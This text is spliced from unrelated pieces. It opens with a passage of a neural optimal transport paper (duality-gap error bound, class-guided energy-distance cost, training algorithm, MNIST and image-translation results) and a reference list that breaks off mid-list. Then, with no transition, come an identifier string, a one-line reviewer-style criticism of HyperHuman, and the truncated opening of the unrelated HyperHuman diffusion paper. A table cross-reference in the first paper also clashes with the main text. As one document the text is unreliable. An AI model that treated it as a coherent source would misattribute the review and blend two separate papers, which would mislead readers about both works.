**Practical considerations.** Every term in (5) can be estimated with Monte Carlo by using random empirical samples from \( P, Q \), allowing us to approach the general OT problem (4) in the continuous setting. To solve problem (5) in practice, one may use neural nets \( T_\theta : \mathbb{R}^D \times \mathbb{R}^S \to \mathbb{R}^D \) and \( v_\phi : \mathbb{R}^D \to \mathbb{R} \) to parametrize \( T \) and \( v \), respectively. To train them, one may employ stochastic gradient ascent-descent (SGAD) using random batches from \( P, Q, S \). We summarize the optimization procedure for general cost functionals \( F \) in Algorithm 2 of Appendix B. In the text below, we focus on two special cases: the class-guided functional \( F_G \) (§5.1), targeted at the dataset transfer task (Figure 2), and the pair-guided functional \( F_S \) (§5.2) for supervised image-to-image style transfer.

**Relation to prior works.** Maximin reformulations analogous to our (5) appear in the continuous OT literature (Korotin et al., 2021c; 2023b; Rout et al., 2022; Fan et al., 2023), yet they are designed only for classic (1) and weak (2) OT. Our formulation is generic and automatically subsumes all of them. It allows using general cost functionals \( F \) which, e.g., may easily take into account side information.

### 4.2 Error Bounds for Approximate Solutions for General OT

For a pair \((\hat{v}, \hat{T})\) approximately solving (5), it is natural to ask how close \( \pi_{\hat{T}} \) is to the OT plan \( \pi^* \). Based on the duality gaps, i.e., the errors of solving the outer and inner optimization problems in (5) with \((\hat{v}, \hat{T})\), we give an upper bound on the difference between \( \pi_{\hat{T}} \) and \( \pi^* \). Our analysis holds for functionals \( F \) which are strongly convex in some metric \( \rho(\cdot, \cdot) \), see Definition 2 in Appendix A. Recall that the strong convexity of \( F \) also implies strict convexity, i.e., the OT plan \( \pi^* \) is unique.

**Theorem 3** (Error analysis via duality gaps for stochastic maps). Let \( F : M(X \times Y) \to \mathbb{R} \cup \{+\infty\} \) be a convex cost functional. Let \( \rho(\cdot, \cdot) \) be a metric on \( \Pi(P) \subset M(X \times Y) \). Assume that \( F \) is \( \beta \)-strongly convex in \( \rho \) on \( \Pi(P) \). Consider the duality gaps for an approximate solution \((\hat{v}, \hat{T})\) of (5):

$$\varepsilon_1(\hat{v}, \hat{T}) \overset{\text{def}}{=} L(\hat{v}, \hat{T}) - \inf_T L(\hat{v}, T),$$

$$\varepsilon_2(\hat{v}) \overset{\text{def}}{=} \sup_v \inf_T L(v, T) - \inf_T L(\hat{v}, T),$$

which are the errors of solving the outer \( \sup_v \) and inner \( \inf_T \) problems in (5), respectively.
Then for the OT plan \( \pi^* \) in (4) between \( P \) and \( Q \) the following inequality holds:

\[
\rho(\pi_{\hat{T}}, \pi^*) \leq \sqrt{\frac{2}{\beta}} \left( \sqrt{\varepsilon_1(\hat{v}, \hat{T})} + \sqrt{\varepsilon_2(\hat{v})} \right),
\]

i.e., the sum of the square roots of the duality gaps upper bounds the error of the plan \( \pi_{\hat{T}} \) w.r.t. \( \pi^* \) in \( \rho(\cdot, \cdot) \).

The significance of our Theorem 3 is manifested when moving from the theoretical objective (5) to its numerical counterpart. In practice, the dual potential \( v \) in (5) is parameterized by NNs (a subset of continuous functions) and may not reach the optimizer \( v^* \). Our duality gap analysis shows that we can still find a good approximation of the OT plan. It suffices to find a pair \((\hat{v}, \hat{T})\) that achieves nearly optimal objective values in the inner \(\inf_T\) and outer \(\sup_v\) problems of (5). For such a pair, \( \pi_{\hat{T}} \) is close to the OT plan \( \pi^* \). To apply our duality gap analysis, strong convexity of \( F \) is required. We give an example of a strongly convex regularizer and a general recipe for using it in Appendix D. In turn, Appendix D.1 demonstrates the application of this regularization technique in practice.

**Relation to prior works.** The authors of (Fan et al., 2023; Rout et al., 2022; Makkuva et al., 2020) carried out error analyses via duality gaps resembling our Theorem 3. Their analyses work only for classic OT (1) and require the potential \( \hat{v} \) to satisfy certain convexity properties. Our error analysis is free from assumptions on \( \hat{v} \) and works for general OT (4) with strongly convex \( F \).

### 5 Learning with General Cost Functionals

In this section, we introduce the class-guided cost functional (§5.1), used for the dataset transfer problem (§6.1), and the pair-guided cost functional (§5.2), used for supervised image-to-image translation (§6.2).

Algorithm 1: Neural optimal transport with the class-guided cost functional $\tilde{F}_G$.

Input: Distributions $P = \sum_n \alpha_n P_n$, $Q = \sum_n \beta_n Q_n$, $S$ accessible by samples (unlabeled); weights $\alpha_n$ are known and samples from each $P_n$, $Q_n$ are accessible (labeled); mapping network $T_\theta : \mathbb{R}^D \times \mathbb{R}^S \rightarrow \mathbb{R}^D$; potential network $v_\omega : \mathbb{R}^D \rightarrow \mathbb{R}$; number of inner iterations $K_T$;
Output: Learned stochastic OT map $T_\theta$ representing an OT plan between distributions $P$, $Q$;
repeat
  Sample (unlabeled) batches $Y \sim Q$, $X \sim P$ and for each $x \in X$ sample a latent batch $Z[x] \sim S$;
  $L_v \leftarrow \sum_{x \in X} \sum_{z \in Z[x]} v_\omega(T_\theta(x,z)) - \sum_{y \in Y} v_\omega(y)$;
  Update $\omega$ by using $\frac{\partial L_v}{\partial \omega}$;
  for $k_T = 1, 2, \ldots, K_T$ do
    Pick $n \in \{1, 2, \ldots, N\}$ at random with probabilities $(\alpha_1, \ldots, \alpha_N)$;
    Sample (labeled) batches $X_n \sim P_n$, $Y_n \sim Q_n$; for each $x \in X_n$ sample a latent batch $Z_n[x] \sim S$;
    $L_T \leftarrow \Delta \mathcal{E}^2(X_n, T_\theta(X_n, Z_n), Y_n) - \sum_{x \in X_n} \sum_{z \in Z_n[x]} v_\omega(T_\theta(x,z))$;
    Update $\theta$ by using $\frac{\partial L_T}{\partial \theta}$;
until not converged;

#### 5.1 Class-Guided Cost Functional

To begin with, we theoretically formalize the problem setup. Let the input distribution $P$ and the output distribution $Q$ each be a mixture of $N$ distributions (classes) $\{P_n\}_{n=1}^N$ and $\{Q_n\}_{n=1}^N$, respectively.
That is, $P = \sum_{n=1}^N \alpha_n P_n$ and $Q = \sum_{n=1}^N \beta_n Q_n$, where $\alpha_n, \beta_n \geq 0$ are the respective weights (class prior probabilities) satisfying $\sum_{n=1}^N \alpha_n = 1$ and $\sum_{n=1}^N \beta_n = 1$.

In this general setup, we aim to find the transport plan $\pi(x,y) \in \Pi(P,Q)$ for which the classes of $x \in X$ and $y \in Y$ coincide for as many pairs $(x,y) \sim \pi$ as possible. That is, its respective stochastic map $T$ should map each component $P_n$ (class) of $P$ to the respective component $Q_n$ (class) of $Q$. The task above is related to domain adaptation and transfer learning problems. It does not always have a solution with each $P_n$ exactly mapped to $Q_n$ due to a possible prior/posterior shift (Kouw & Loog, 2018). We aim to find a stochastic map $T$ between $P$ and $Q$ satisfying $T\sharp(P_n \times S) \approx Q_n$ for all $n = 1, \ldots, N$.

To solve the above-discussed problem, we propose the following functional:

$$F_G(\pi) = \tilde{F}_G(T_\pi) \overset{\text{def}}{=} \sum_{n=1}^N \alpha_n \mathcal{E}^2(T_\pi\sharp(P_n \times S), Q_n), \tag{7}$$

where $\mathcal{E}$ denotes the energy distance (8). For two distributions $Q, Q' \in \mathcal{P}(Y)$ with $Y \subset \mathbb{R}^D$, the (square of the) energy distance $\mathcal{E}$ (Rizzo & Székely, 2016) between them is:

$$\mathcal{E}^2(Q, Q') = \mathbb{E}\|Y_1 - Y_2\|_2 - \frac{1}{2}\mathbb{E}\|Y_1 - Y'_1\|_2 - \frac{1}{2}\mathbb{E}\|Y_2 - Y'_2\|_2, \tag{8}$$

where $Y_1, Y'_1 \sim Q$ and $Y_2, Y'_2 \sim Q'$ are independent random vectors. The energy distance (8) is a particular case of the Maximum Mean Discrepancy (Sejdinovic et al., 2013). It equals zero only when $Q = Q'$. Hence, our functional (7) is non-negative and attains zero value when the components of $P$ are correctly mapped to the respective components of $Q$ (if this is possible).

**Theorem 4** (Properties of the class-guided cost functional $F_G$). The functional $F_G(\pi)$ is convex in $\pi \in \Pi(P)$, lower semi-continuous, and separably *-increasing.

In practice, each of the terms $\mathcal{E}^2(T_\pi\sharp(P_n \times S), Q_n)$ in (7) admits estimation from samples of $\pi$.

**Proposition 1** (Estimator for $\mathcal{E}^2$). Let $X_n \sim P_n$ be a batch of $K_X$ samples from class $n$. For each $x \in X_n$ let $Z_n[x] \sim S$ be a latent batch of size $K_Z$. Consider a batch $Y_n \sim Q_n$ of size $K_Y$. Then

$$\Delta \mathcal{E}^2(X_n, T(X_n, Z_n), Y_n) \overset{\text{def}}{=} \frac{\sum_{y \in Y_n} \sum_{x \in X_n} \sum_{z \in Z_n[x]} \|y - T(x,z)\|_2}{K_X K_Y K_Z} - \frac{\sum_{x \in X_n} \sum_{z \in Z_n[x]} \sum_{x' \in X_n \setminus \{x\}} \sum_{z' \in Z_n[x']} \|T(x,z) - T(x',z')\|_2}{2(K_X^2 - K_X) K_Z^2} \tag{9}$$

is an estimator of $\mathcal{E}^2(T\sharp(P_n \times S), Q_n)$ up to a constant $T$-independent shift (a code sketch of this estimator is given below). To estimate $\tilde{F}_G(T)$, one may separately estimate the terms $\mathcal{E}^2(T\sharp(P_n \times S), Q_n)$ for each $n$ and sum them up with the weights $\alpha_n$. At each iteration, we estimate only the $n$-th term, with $n$ chosen with probability $\alpha_n$.

We highlight two key details of the estimation of (7) which significantly differ from the estimation of the classic (1) and weak (2) OT costs appearing in related works (Korotin et al., 2023b; 2021b; Fan et al., 2023). First, one has to sample not just from the input distribution $P$, but separately from each of its components (classes) $P_n$. Moreover, one also has to be able to separately sample from the components $Q_n$ of the target distribution $Q$.
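To make Proposition 1 concrete, the following is a minimal PyTorch sketch of the estimator (9). It is an illustration written for this text, not the authors' released code; the tensor layout and the use of `torch.cdist` are our own choices.

```python
import torch

def energy_distance_estimator(t_xz: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
    """Estimator (9) of E^2(T#(P_n x S), Q_n), up to a T-independent constant.

    t_xz: mapped samples T(x, z), shape (K_X, K_Z, D);
    y:    target-class batch Y_n ~ Q_n, shape (K_Y, D).
    """
    K_X, K_Z, D = t_xz.shape
    t_flat = t_xz.reshape(K_X * K_Z, D)
    # First term of (9): mean distance between mapped samples and Y_n.
    cross = torch.cdist(t_flat, y).mean()
    # Second term of (9): distances between mapped samples with x != x'.
    within = torch.cdist(t_flat, t_flat)
    same_x = torch.eye(K_X, device=t_xz.device)
    same_x = same_x.repeat_interleave(K_Z, dim=0).repeat_interleave(K_Z, dim=1)
    within_sum = (within * (1.0 - same_x)).sum()
    return cross - within_sum / (2 * (K_X**2 - K_X) * K_Z**2)
```

The estimator is differentiable in the outputs of $T$, so it can serve directly as the $\Delta\mathcal{E}^2$ term of $L_T$ in Algorithm 1.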
This per-class sampling is where the guidance (semi-supervision) happens. We note that to estimate classic (1) or weak (2) costs, no target samples from \( Q \) are needed at all, i.e., they can be viewed as unsupervised.

In practice, we assume that the learner is given a labelled empirical sample from \( P \) for training. In contrast, we assume that the available samples from \( Q \) are only partially labelled (with \( \geq 1 \) labelled data point per class). That is, we know the class label only for a limited amount of data (Figure 2). In this case, all \( N \) cost terms (9) can still be stochastically estimated. These cost terms are used to learn the transport map \( T_\theta \) in Algorithm 1. The remaining (unlabeled) samples are used when training the potential \( v_\omega \), as labels are not needed to update the potential in (5). We provide the detailed procedure for learning with the functional \( F_G \) (7) in Algorithm 1; a sketch of one training iteration is shown below.

#### 5.2 Pair-Guided Cost Functional

In this section, we demonstrate the general OT formulation with another practically appealing specification. In particular, we define the pair-guided general OT cost functional. For a given paired dataset \((x_1, y^*(x_1)), \ldots, (x_N, y^*(x_N))\) with samples \( X_{1:N} = \{x_1, \ldots, x_N\} \) and \( y^*(X_{1:N}) = \{y^*(x_1), \ldots, y^*(x_N)\} \), which are assumed to follow the source \( P \) and target \( Q \) distributions, respectively, we introduce:

\[
F_S(\pi) \overset{\text{def}}{=} \int_{X \times Y} \ell(y, y^*(x)) \, d\pi(x, y). \tag{10}
\]

The function \( \ell : Y \times Y \to \mathbb{R} \) is an appropriate loss measuring the difference between samples. In the majority of our experiments we choose \( \ell(y, y') = \|y - y'\|_2 \). In practice, to estimate (10), we assume that the learner is given labelled empirical samples of \( P \) and \( Q \) for training. Using the cost (10), which can handle such information, we can train the optimal mapping in a supervised manner. In §6.2, we show how our method, together with the pair-guided functional \( F_S \), is directly applicable to the paired image-to-image translation problem.

### 6 Experimental Illustrations

Our Algorithm 1 is capable of learning both stochastic (one-to-many) \( T(x, z) \) and deterministic (one-to-one) \( T(x, z) \equiv T(x) \) transport maps. For the latter, no random noise \( z \) is added to the input. First, we implement stochastic and deterministic maps along with our class-guided cost functional \( F_G \) to address the dataset transfer problem (§6.1). Second, using the deterministic transport map \( T(x) \), we apply our pair-guided functional \( F_S \) to solve supervised image-to-image translation (§6.2). In the Appendix, we provide experiments with toy data (C.2), the biological batch effect problem (C.13), and various paired image-to-image datasets (E). The code for the experiments can be found at https://github.com/machinestein/gnot.

#### 6.1 Class-Guided Experiments

**Datasets.** We use the MNIST (LeCun & Cortes, 2010), FashionMNIST (Xiao et al., 2017), and MNIST-M (Ganin & Lempitsky, 2015) datasets as \( P, Q \). Each dataset has 10 (balanced) classes and a pre-defined train-test split. In this experiment, the goal is to find a class-wise map between unrelated domains: FMNIST \( \rightarrow \) MNIST and MNIST \( \rightarrow \) MNIST-M. We use the default class correspondence between the datasets.
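Before turning to the experimental details, here is the promised minimal PyTorch-style sketch of one iteration of Algorithm 1, reusing `energy_distance_estimator` from the previous sketch. The MLP architectures, toy dimensions, batch handling, and learning rates are illustrative assumptions, not the configuration used in the paper.

```python
import torch

D, Z_DIM = 784, 16                     # toy data/latent dimensions (assumption)
T_theta = torch.nn.Sequential(torch.nn.Linear(D + Z_DIM, 256), torch.nn.ReLU(),
                              torch.nn.Linear(256, D))
v_omega = torch.nn.Sequential(torch.nn.Linear(D, 256), torch.nn.ReLU(),
                              torch.nn.Linear(256, 1))
opt_T = torch.optim.Adam(T_theta.parameters(), lr=1e-4)
opt_v = torch.optim.Adam(v_omega.parameters(), lr=1e-4)

def map_batch(x, k_z=4):
    """Apply T_theta to each x with k_z latent draws; returns (B, k_z, D)."""
    z = torch.randn(x.size(0), k_z, Z_DIM)
    xz = torch.cat([x.unsqueeze(1).expand(-1, k_z, -1), z], dim=-1)
    return T_theta(xz)

def train_step(x_unlab, y_unlab, x_n, y_n, k_inner=10):
    """One iteration of Algorithm 1: an outer potential update on unlabeled
    batches, then k_inner inner map updates on a labeled class-n batch
    (class n is assumed drawn with probability alpha_n by the caller)."""
    # Outer step: descend L_v = E v(T(x,z)) - E v(y), updating omega only.
    loss_v = v_omega(map_batch(x_unlab).detach()).mean() - v_omega(y_unlab).mean()
    opt_v.zero_grad(); loss_v.backward(); opt_v.step()
    # Inner steps: descend L_T = Delta E^2 - E v(T(x,z)), updating theta.
    for _ in range(k_inner):
        t_xz = map_batch(x_n)
        loss_T = energy_distance_estimator(t_xz, y_n) - v_omega(t_xz).mean()
        opt_T.zero_grad(); loss_T.backward(); opt_T.step()
```

For the pair-guided functional (10), the inner loss would instead estimate $F_S$ by averaging $\ell(T(x), y^*(x))$ over paired samples; the overall saddle-point structure is unchanged.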
For completeness, in the Appendices we provide additional results with imbalanced classes (C.8), non-default correspondence (C.11), and other datasets (C).

**Baselines.** We compare our method to pixel-level adaptation methods (Zhu et al., 2017; Hoffman et al., 2018; Liu et al., 2017), namely the (one-to-many) AugCycleGAN (Almahairi et al., 2018) and MUNIT (Huang et al., 2018). We use the official implementations with the hyperparameters from the respective papers. We test Neural OT (Korotin et al., 2023b; Fan et al., 2023) with Euclidean cost functions: the quadratic cost \( \frac{1}{2} \|x - y\|^2_2 \) (\( \mathcal{W}_2 \)) and the \( \gamma \)-weak (one-to-many) quadratic cost (\( \mathcal{W}_{2,\gamma} \), \( \gamma = \frac{1}{10} \)). For semi-supervised mapping, we considered the (one-to-one) OTDD flow (Alvarez-Melis & Fusi, 2021; 2020). This method employs gradient flows to perform the transfer while preserving the class label. We also examine a general Discrete OT (DOT) method which uses labels. In particular, we adopted the solver from `ot.da` (Flamary et al., 2021) with its default out-of-sample estimation procedure. The solver utilizes the Sinkhorn algorithm (Cuturi, 2013) with Laplacian cost regularization (Courty et al., 2016). We show the results of the ICNN-based OT method (Makkuva et al., 2020; Korotin et al., 2021a) in Appendix C.9.

Figure 3: The results of class-preserving mapping between two unrelated (left) and related (right) datasets. Each column shows the transfer result of a random (test) input \( x \sim P_n \) (first row) from a particular class (\( n = 0, 1, \ldots, 9 \)). Each row shows the results of transfer via a particular method. For methods which learn a stochastic map \( T(x, z) \), we show their output \( T(x, z) \) for a random noise \( z \).

Table 1: Accuracy↑ of the maps learned by the translation methods in view.

| Datasets (32 × 32) | MUNIT | AugCycleGAN | OTDD (flow) | SinkhornLpL1 (DOT) | \( \mathcal{W}_2 \) | \( \mathcal{W}_{2,\gamma} \) | \( F_G \), no \( z \) | \( F_G \) |
|---|---|---|---|---|---|---|---|---|
| FMNIST → MNIST | 8.93 | 12.03 | 10.28 | 10.67 | 10.96 | 8.02 | 82.79 | 83.22 |
| MNIST → MNIST-M | 97.95 | 98.2 | - | 83.26 | 38.77 | 37.0 | 95.27 | 94.62 |

Table 2: FID↓ of the samples generated by the translation methods in view.

| Datasets (32 × 32) | MUNIT | AugCycleGAN | OTDD (flow) | SinkhornLpL1 (DOT) | \( \mathcal{W}_2 \) | \( \mathcal{W}_{2,\gamma} \) | \( F_G \), no \( z \) | \( F_G \) |
|---|---|---|---|---|---|---|---|---|
| FMNIST → MNIST | 7.91 | 26.35 | > 100 | > 100 | 7.51 | 7.02 | 7.14 | 5.26 |
| MNIST → MNIST-M | 11.68 | 26.87 | - | > 100 | 19.43 | 17.48 | 18.56 | 6.67 |

**Metrics.** All the models are fitted on the train parts of the datasets; all the provided qualitative and quantitative results are exclusively for test (unseen) data. To evaluate the visual quality, we compute the FID (Heusel et al., 2017) of the entire mapped source test set w.r.t. the entire target test set. To estimate the accuracy of the mapping, we use a ResNet18 (He et al., 2016) classifier (with 95+% accuracy) pre-trained on the target data. We consider the mapping \( T \) to be correct if the predicted label for the mapped sample \( T(x, z) \) matches the corresponding label of \( x \) (a short sketch of this metric is given below).
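For illustration, a minimal sketch of the accuracy metric follows; the classifier, data loader, and latent dimension are stand-ins rather than the exact evaluation code.

```python
import torch

@torch.no_grad()
def class_preservation_accuracy(T_map, classifier, test_loader, z_dim=16):
    """Accuracy metric of Sec. 6.1: the map is counted correct when a
    classifier pre-trained on the target domain assigns T(x, z) the label of x."""
    correct, total = 0, 0
    for x, labels in test_loader:
        z = torch.randn(x.size(0), z_dim)
        preds = classifier(T_map(x, z)).argmax(dim=1)
        correct += (preds == labels).sum().item()
        total += labels.numel()
    return correct / total
```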
**Results.** Qualitative results are shown in Figure 3; FID and accuracies are reported in Tables 2 and 1, respectively. To keep the figures simple, for all the models (one-to-one, one-to-many) we plot a single output per input. For completeness, in Appendices C.5–C.6 we show multiple outputs per input for our method, and in Appendix C.7 we provide an ablation study on the size of \( Z \). Our method, general discrete OT, and OTDD use 10 labeled samples for each class in the target. The other baselines lack the capability to use label information. As seen in Figure 3 and Table 1, our approach preserves the class-wise structure accurately with just 10 labelled samples per class. The accuracy of the other neural OT methods is around 10%, equivalent to a random guess. Neither the general discrete OT nor the OTDD method preserves the class structure in high dimensions, resulting in samples with poor FID, see Table 2. Visually, the OTDD results are comparable to those in Figure 3 of (Alvarez-Melis & Fusi, 2021).

#### 6.2 Pair-Guided Experiments

**Datasets and metrics.** We utilize three popular datasets for our evaluation: Comic-Faces-V1, Edges-to-Shoes (Isola et al., 2017), and CelebAMask-HQ (Lee et al., 2020). These datasets all contain pairs of images (handmade or synthetically constructed) and are commonly employed in benchmarking supervised image translation methods. For all experiments, we operate at a resolution of $256 \times 256$ pixels. All the results (qualitative, quantitative) are on the test sets in accordance with the default train-test splits of the datasets. As the metric, we use the test FID (as in §6.1).

**Baselines.** As the baselines, we consider the basic (unsupervised) NOT algorithm (Korotin et al., 2023b), RMSE regression, and the well-known supervised Pix2Pix method (Isola et al., 2017).

**Details.** In our method, we use U2Net as the transport map $T_\theta(x)$ and the WGAN-QC discriminator's ResNet architecture (He et al., 2016) for the potential $v_\omega$. In the Comic-Faces-V1 and Edges-to-Shoes experiments, we use RMSE as the function $\ell$ in our method. In the CelebAMask-HQ case, we use a VGG-based perceptual loss. Other details are given in Appendix E.3.

**Results.** The evaluation results and comparisons with the baselines for the Comic-Faces-V1 and Edges-to-Shoes datasets are presented in Figures 4 and 21, respectively. Additionally, the computed FID scores for these datasets are detailed in Table 2 in the appendix. For the CelebAMask-HQ dataset, we achieve an FID score of 21.1. Examples of generated images are provided in Figures 1 and 22. Further qualitative experimentation is conducted on the Comic-Faces-V1 dataset at a higher resolution of $512 \times 512$; see Figure 23. Overall, the obtained results show that our method achieves competitive quality and can be further applied to high-quality generation and editing tasks.

### 7 Discussion

Our method is a generic tool for learning transport maps between data distributions with a task-specific cost functional $F$. In general, the potential impact of our work on society depends on the scope of its application in digital content creation. As a limitation, we note that to apply our method, one has to provide an estimator $\hat{F}(T)$ for the functional $F$, which may be non-trivial. Besides, the construction of a cost functional $F$ for a particular downstream task may not be straightforward. This should be taken into account when using the method in practice.
Constructing task-specific functionals $F$ and estimators $\hat{F}$ is a promising future research avenue.

8 ACKNOWLEDGEMENT

The work was supported by the Analytical center under the RF Government (subsidy agreement 000000D730321P5Q0002, Grant No. 70-2021-00145 02.11.2021).

REFERENCES

J-J Alibert, Guy Bouchitté, and Thierry Champion. A new class of costs for optimal transport planning. European Journal of Applied Mathematics, 30(6):1229–1263, 2019.

Amjad Almahairi, Sai Rajeshwar, Alessandro Sordoni, Philip Bachman, and Aaron Courville. Augmented CycleGAN: Learning many-to-many mappings from unpaired data. In International Conference on Machine Learning, pp. 195–204. PMLR, 2018.

David Alvarez-Melis and Nicolò Fusi. Geometric dataset distances via optimal transport. Advances in Neural Information Processing Systems, 33:21428–21439, 2020.

David Alvarez-Melis and Nicolò Fusi. Dataset dynamics via gradient flows in probability space. In International Conference on Machine Learning, pp. 219–230. PMLR, 2021.

David Alvarez-Melis, Yair Schiff, and Youssef Mroueh. Optimizing functionals on the space of probabilities with input convex neural networks. Transactions on Machine Learning Research, 2022.

Brandon Amos, Lei Xu, and J Zico Kolter. Input convex neural networks. In Proceedings of the 34th International Conference on Machine Learning, Volume 70, pp. 146–155. JMLR.org, 2017.

Martin Arjovsky and Léon Bottou. Towards principled methods for training generative adversarial networks. arXiv preprint arXiv:1701.04862, 2017.

Julio Backhoff-Veraguas, Mathias Beiglböck, and Gudmund Pammer. Existence, duality, and cyclical monotonicity for weak transport costs. Calculus of Variations and Partial Differential Equations, 58(6):1–28, 2019.

Lukas Biewald. Experiment tracking with Weights and Biases, 2020. URL https://www.wandb.com/. Software available from wandb.com.

Nicolas Bonneel and Julie Digne. A survey of optimal transport for computer graphics and computer vision. In Computer Graphics Forum, 2023.

Victor Bouniakowsky. Sur quelques inégalités concernant les intégrales ordinaires et les intégrales aux différences finies, volume 1. Mem. Acad. St. Petersburg, 1859.

Charlotte Bunne, Laetitia Meng-Papaxanthos, Andreas Krause, and Marco Cuturi. JKOnet: Proximal optimal transport modeling of population dynamics, 2021.

Nicolas Courty, Rémi Flamary, Devis Tuia, and Alain Rakotomamonjy. Optimal transport for domain adaptation. IEEE Transactions on Pattern Analysis and Machine Intelligence, 39(9):1853–1865, 2016.

Marco Cuturi. Sinkhorn distances: Lightspeed computation of optimal transport. In Advances in Neural Information Processing Systems, pp. 2292–2300, 2013.

Grady Daniels, Tyler Maunu, and Paul Hand. Score-based generative neural networks for large-scale optimal transport. Advances in Neural Information Processing Systems, 34, 2021.

Nabarun Deb, Promit Ghosal, and Bodhisattva Sen. Rates of estimation of optimal transport maps using plug-in estimators via barycentric projections. Advances in Neural Information Processing Systems, 34:29736–29753, 2021.

Montacer Essid and Justin Solomon. Quadratically regularized optimal transport on graphs. SIAM Journal on Scientific Computing, 40(4):A1961–A1986, 2018.
duyA42HlCK
The paper's objective is to address incoherent body parts and unnatural poses. However, it falls short of providing quantitative metrics that evaluate how effectively the proposed method resolves these specific issues.
**HyperHuman: Hyper-Realistic Human Generation with Latent Structural Diffusion** Xian Liu\(^1,2\)*, Jian Ren\(^1\)† Aliaksandr Siarohin\(^1\) Ivan Skorokhodov\(^1\) Yanyu Li\(^1\) Dahua Lin\(^2\) Xihui Liu\(^3\) Ziwei Liu\(^4\) Sergey Tulyakov\(^1\) \(^1\)Snap Inc. \(^2\)CUHK \(^3\)HKU \(^4\)NTU Project Page: https://snap-research.github.io/HyperHuman **Abstract** Despite significant advances in large-scale text-to-image models, achieving hyper-realistic human image generation remains a desirable yet unsolved task. Existing models like Stable Diffusion and DALL-E 2 tend to generate human images with incoherent parts or unnatural poses. To tackle these challenges, our key insight is that human image is inherently structural over multiple granularities, from the coarse-level body skeleton to the fine-grained spatial geometry. Therefore, capturing such correlations between the explicit appearance and latent structure in one model is essential to generate coherent and natural human images. To this end, we propose a unified framework, **HyperHuman**, that generates in-the-wild human images of high realism and diverse layouts. Specifically, 1) we first build a large-scale human-centric dataset, named **HumanVerse**, which consists of 340M images with comprehensive annotations like human pose, depth, and surface-normal. 2) Next, we propose a **Latent Structural Diffusion Model** that simultaneously denoises the depth and surface-normal along with the synthesized RGB image. Our model enforces the joint learning of image appearance, spatial relationship, and geometry in a unified network, where each branch in the model complements to each other with both structural awareness and textural richness. 3) Finally, to further boost the visual quality, we propose a **Structure-Guided Refiner** to compose the predicted conditions for more detailed generation of higher resolution. Extensive experiments demonstrate that our framework yields the state-of-the-art performance, generating hyper-realistic human images under diverse scenarios. **1 Introduction** Generating hyper-realistic human images from user conditions, e.g., text and pose, is of great importance to various applications, such as image animation (Liu et al., 2019) and virtual try-on (Wang et al., 2018). To this end, many efforts explore the task of controllable human image generation. Early methods either resort to variational auto-encoders (VAEs) in a reconstruction manner (Ren et al., 2020), or improve the realism by generative adversarial networks (GANs) (Siarohin et al., 2019). Though some of them create high-quality images (Zhang et al., 2022; Jiang et al., 2022), the unstable training and limited model capacity confine them to small datasets of low diversity. Recent emergence of diffusion models (DMs) (Ho et al., 2020) has set a new paradigm for realistic synthesis and become the predominant architecture in Generative AI (Dhariwal & Nichol, 2021). Nevertheless, the exemplar text-to-image (T2I) models like Stable Diffusion (Rombach et al., 2022) and DALL-E 2 (Ramesh et al., 2022) still struggle to create human images with coherent anatomy, e.g., arms and legs, and natural poses. The main reason lies in that human is articulated with non-rigid deformations, requiring structural information that can hardly be depicted by text prompts. 
To enable structural control for image generation, recent works like ControlNet (Zhang & Agrawala, 2023) and T2I-Adapter (Mou et al., 2023) introduce a learnable branch to modulate the pre-trained DMs, e.g., Stable Diffusion, in a plug-and-play manner. However, these approaches suffer from the feature discrepancy between the main and auxiliary branches, leading to inconsistency between the control signals (e.g., pose maps) and the generated images. To address the issue, HumanSD (Ju et al., 2023b) proposes to directly input the body skeleton into the diffusion U-Net by channel-wise concatenation. However, it is confined to generating artistic-style images of limited diversity. Besides, human images are synthesized only with pose control, while other structural information like depth maps and surface-normal maps is not considered. In a nutshell, previous studies either take a singular control signal as the input condition, or treat different control signals separately as independent guidance, instead of modeling the multi-level correlations between human appearance and different types of structural information. Realistic human generation with coherent structure remains unsolved.

Figure 1: Example Results and Visual Comparison. Top: The proposed HyperHuman simultaneously generates the coarse RGB, depth, normal, and high-resolution images conditioned on text and skeleton. Both photo-realistic images and stylistic renderings can be created. Bottom: We compare with recent T2I models, showing better realism, quality, diversity, and controllability. Note that in each $2 \times 2$ grid (left), the upper-left is the input skeleton, while the others are the jointly denoised normal, depth, and coarse RGB of $512 \times 512$. With the full model, we synthesize images up to $1024 \times 1024$ (right). Please refer to Sec. A.15, A.16 for more comparison and results. Best viewed zoomed in.

In this paper, we propose a unified framework **HyperHuman** to generate in-the-wild human images of high realism and diverse layouts. The key insight is that *human image is inherently structural over multiple granularities, from the coarse-level body skeleton to fine-grained spatial geometry*. Therefore, capturing such correlations between the explicit appearance and latent structure in one model is essential to generate coherent and natural human images. Specifically, we first establish a large-scale human-centric dataset called **HumanVerse** that contains 340M in-the-wild human images of high quality and diversity. It has comprehensive annotations, such as coarse-level body skeletons, fine-grained depth and surface-normal maps, and high-level image captions and attributes. Based on this, two modules are designed for hyper-realistic controllable human image generation. In the **Latent Structural Diffusion Model**, we augment the pre-trained diffusion backbone to simultaneously denoise the RGB, depth, and normal. Appropriate network layers are chosen to be replicated as structural expert branches, so that the model can both handle input/output of different domains and guarantee the spatial alignment among the denoised textures and structures. Thanks to such a dedicated design, the image appearance, spatial relationship, and geometry are jointly modeled within a unified network, where the branches complement each other with both structural awareness and textural richness.
To generate monotonous depth and surface-normal that have similar values in local regions, we utilize an improved noise schedule to eliminate low-frequency information leakage. The same timestep is sampled for each branch to achieve better learning and feature fusion. With the spatially-aligned structure maps, in **Structure-Guided Refiner**, we compose the predicted conditions for detailed generation of high resolution. Moreover, we design a robust conditioning scheme to mitigate the effect of error accumulation in our two-stage generation pipeline. To summarize, our main contributions are three-fold: 1) We propose a novel **HyperHuman** framework for in-the-wild controllable human image generation of high realism. A large-scale human-centric dataset **HumanVerse** is curated with comprehensive annotations like human pose, depth, and surface normal. As one of the earliest attempts in human generation foundation model, we hope to benefit future research. 2) We propose the **Latent Structural Diffusion Model** to jointly capture the image appearance, spatial relationship, and geometry in a unified framework. The **Structure-Guided Refiner** is further devised to compose the predicted conditions for generation of better visual quality and higher resolution. 3) Extensive experiments demonstrate that our **HyperHuman** yields the state-of-the-art performance, generating hyper-realistic human images under diverse scenarios. ## Related Work ### Text-to-Image Diffusion Models Text-to-image (T2I) generation, the endeavor to synthesize high-fidelity images from natural language descriptions, has made remarkable strides in recent years. Distinguished by the superior scalability and stable training, diffusion-based T2I models have eclipsed conventional GANs in terms of performance (Dhariwal & Nichol, 2021), becoming the predominant choice in generation (Nichol et al., 2021; Saharia et al., 2022; Balaji et al., 2022; Li et al., 2023). By formulating the generation as 